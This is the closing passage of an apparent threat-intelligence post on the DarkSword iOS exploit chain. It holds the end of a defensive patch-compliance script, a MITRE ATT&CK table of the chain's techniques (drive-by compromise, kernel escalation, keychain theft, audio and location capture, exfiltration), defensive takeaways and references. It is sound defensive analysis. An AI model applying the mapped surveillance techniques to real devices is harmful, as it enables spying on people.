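
if __name__ == "__main__":
    print("naive check passes 26.2:", naive_is_compliant("26.2"))   # True: the trap
    print("per-branch check passes 26.2:", is_compliant("26.2"))    # False
    print("block:", noncompliant_devices(SAMPLE_INVENTORY))
```

Keep `MIN_BY_BRANCH` under change control and bump it from Apple's security release notes rather than from news coverage; the same two-branch logic applies to every future iOS fix cycle, not only this one.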
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Drive-by Compromise | T1189 |
| Execution | Exploitation for Client Execution (Browser) | T1203 |
| Privilege Escalation | Exploitation for Privilege Escalation (Kernel) | T1068 |
| Defense Evasion | Indicator Removal: File Deletion (crash logs) | T1070.004 |
| Defense Evasion | Exploitation for Defense Evasion (sandbox escape) | T1211 |
| Defense Evasion | Reflective Code Loading (fileless JS) | T1620 |
| Credential Access | Credentials from Password Stores: Keychain | T1555.001 |
| Credential Access | Steal Web Session Cookie | T1539 |
| Collection | Data from Local System | T1005 |
| Collection | Email Collection | T1114 |
| Collection | Screen Capture | T1113 |
| Collection | Audio Capture (GHOSTKNIFE) | T1123 |
| Collection | Location Tracking | T1430 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
| Exfiltration | Automated Exfiltration | T1020 |
The IDs above are from the ATT&CK Enterprise matrix, except T1430 (Location Tracking), which is a Mobile-matrix technique. If a mobile-only mapping is wanted, the Mobile matrix has its own IDs for drive-by compromise (T1456) and kernel privilege escalation (T1404).
Conclusion
DarkSword represents a new baseline for mobile threat capability — a fully JavaScript-based, six-stage iOS exploit chain that achieves root kernel access through a browser visit, deploys customized surveillance payloads, and self-destructs within minutes.
Its proliferation across Russian intelligence, Turkish commercial vendors, and unknown Gulf-region actors within the same time window reveals an uncomfortable truth: nation-state-grade mobile exploitation is no longer exclusive to nations. It is bought, sold, licensed, and iterated upon in a commercial market that operates in the grey zone between intelligence tools and criminal spyware.
Three takeaways for the mobile security community:
- iOS security is strong but not invincible: six chained bugs, several of them exploited as zero-days, were silently used in the wild for months before disclosure
- The commercial spyware industry is the distribution mechanism — Pegasus, Predator, Coruna, DarkSword all share the same market structure
- The only reliable protection is current patches + Lockdown Mode — architectural iOS defenses delayed but did not prevent exploitation
Update your phone. Enable Lockdown Mode if you’re at risk. And treat every unpatched iPhone as a potential surveillance device.
References
- Google Threat Intelligence — DarkSword iOS Exploit Chain
- Google Threat Intelligence — Coruna iOS Exploit Kit
- Zimperium — DarkSword: Successor to Coruna
- Lookout — DarkSword Threat Intelligence
- iVerify — DarkSword Explained
- The Hacker News — DarkSword Uses 6 iOS Flaws
- Security Week — DarkSword Used by State Hackers and Spyware Vendors
- Bleeping Computer — DarkSword iOS Exploit
- CyberScoop — Russian Hackers Use iPhone Exploit Against Ukraine
- CISA KEV — March 20, 2026
- Tom’s Guide — 220 Million iPhones Under Attack
This post is intended for security researchers, mobile threat analysts, and enterprise security teams. All technical analysis is based on publicly disclosed research.